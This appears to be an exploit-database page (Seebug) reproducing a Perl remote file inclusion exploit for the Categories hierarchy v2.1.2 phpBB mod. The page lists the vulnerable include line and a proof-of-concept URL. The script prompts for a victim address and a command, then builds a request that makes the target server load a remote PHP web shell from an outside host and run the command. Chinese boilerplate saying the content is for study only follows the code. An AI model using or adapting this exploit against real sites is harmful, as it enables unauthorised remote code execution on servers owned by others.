# (C) xoron # # [Name: Categories hierarchy v2.1.2 (phpbb_root_path) Remote File Include Exploit] # # [Script name: Ptifo mod-CH_212_installed # # [Author: xoron] # [Exploit coded by xoron] # # [Download: http://sourceforge.net/project/showfiles.php?group_id=125710] # # [xoron.biz - xoron.info] # # [Thanx: str0ke, kacper, k1tk4t, SHiKA, can bjorn] # # [Tesekkurler: chaos, pang0, DJR] # # [POC: /includes/class_template.php?phpbb_root_path=http://evilscripts?] # # [Vuln Codes: include($phpbb_root_path . 'includes/template.' . $phpEx); ] # # $rfi = "class_template.php?phpbb_root_path="; $path = "/includes/"; $shell = "http://pang0.by.ru/shall/pang057.zz?cmd="; print "Language: English // Turkish Plz Select Lang: "; $dil = <STDIN>; chop($dil); if($dil eq "English"){ print "(c) xoron "; &ex; } elsif($dil eq "Turkish"){ print "Kodlayan xoron "; &ex; } else {print "Plz Select Languge "; exit;} sub ex{ $not = "Victim is Not Vunl. " and $not_cmd = "Victim is Vunl but Not doing Exec. " and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:" if $dil eq "English"; $not = "Adreste RFI acigi Yok " and $not_cmd = "Adresde Ac齥 Var Fakat Kod Calismiyor " and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:" if $dil eq "Turkish"; print "$vic"; $victim = <STDIN>; chop($victim); print "$diz"; $dizn = <STDIN>; chop($dizn); $dizin = $dizn; $dizin = "/" if !$dizn; print "$komt"; $cmd = <STDIN>; chop($cmd); $cmmd = $cmd; $cmmd = "dir" if !$cmd; $site = $victim; $site = "http://$victim" if !($victim =~ /http/); $acacaz = "$site$dizin$rfi$shell$cmmd"; print "(c) xoron.info - xoron.biz $thx: pang0, chaos, can bjorn "; sleep 3; system("start $acacaz"); }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论